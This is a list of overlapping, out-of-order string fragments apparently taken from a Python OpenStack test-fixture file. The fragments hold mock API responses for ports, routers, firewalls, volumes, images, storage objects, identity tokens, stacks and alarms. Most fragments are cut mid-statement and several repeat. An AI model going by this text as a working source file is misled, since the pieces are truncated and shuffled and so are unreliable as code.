"= [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" }",
"True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\",",
"u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types':",
"LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1,",
"u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST",
"Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT,",
"\"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\":",
"\"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ]",
"\"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True",
"'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links':",
"], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": {",
"] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\":",
"FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS",
"\"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"\"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\": [",
"\"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\":",
"'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' },",
"\"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, {",
"alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ],",
"{ \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\":",
"] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\":",
"{ \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\":",
"False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\":",
"\"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] }",
"\"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [],",
"\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\":",
"\"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST = {",
"\"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False,",
"\"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\":",
"u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a'",
"'225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292'",
"\"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\",",
"\"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None,",
"\"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\":",
"None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID",
"[{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network",
"\"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST =",
"\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\":",
"[ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\":",
"False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ],",
"True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ]",
"METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\":",
"{ 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\":",
"FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True,",
"PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [",
"\"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\":",
"\"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4",
"}, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\":",
"= { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\":",
"{u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id':",
"} ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at':",
"License. You may obtain # a copy of the License at # #",
"\"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\",",
"port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]}",
"False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\":",
"\"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\",",
"test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\":",
"\"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\",",
"[ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\":",
"= { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [",
"{ \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, {",
"\"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8'",
"\"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0,",
"\"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0]",
"= [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"]",
"\"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] }",
"} ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None,",
"\"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\":",
"ANY KIND, either express or implied. See the # License for the specific",
"} ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\":",
"\"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\":",
"\"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\":",
"} ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\":",
"} ] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\",",
"}, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\":",
"\"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None,",
"the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL =",
"{ \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ],",
"\"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\":",
"{u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z'",
"\"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\":",
"\"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\",",
"] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000',",
"None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\",",
"\"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\":",
"[ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\":",
"\"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\":",
"\"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\",",
"\"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID,",
"\"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [ { \"status\":",
"'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\":",
"\"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }, {",
"\"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\",",
"\"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\":",
"u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'},",
"\"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\":",
"u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10,",
"language governing permissions and limitations # under the License. TOKEN_ID = '<KEY>' USER_ID",
"See the # License for the specific language governing permissions and limitations #",
"\"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": {",
"\"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\":",
"None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\":",
"law or agreed to in writing, software # distributed under the License is",
"\"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\",",
"\"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\":",
"\"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\",",
"\"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None,",
"# a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"% AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel':",
"= 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT =",
"{}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\",",
"\"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" }",
"{ \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\",",
"None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\",",
"'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service',",
"True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] }",
"\"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\":",
"10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\":",
"[\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, {",
"\"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\":",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"= { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [],",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{",
"'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS =",
"None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\",",
"\"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\":",
"\"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\":",
"\"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\":",
"None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\",",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z',",
"\"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\":",
"'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles':",
"NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True,",
"{ \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS",
"'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network'",
"\"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [",
"[], 'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL':",
"\"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"\"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\":",
"'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type':",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS = { \"ports\": [",
"'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS =",
"u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten',",
"'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service',",
"\"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\",",
"{ \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\":",
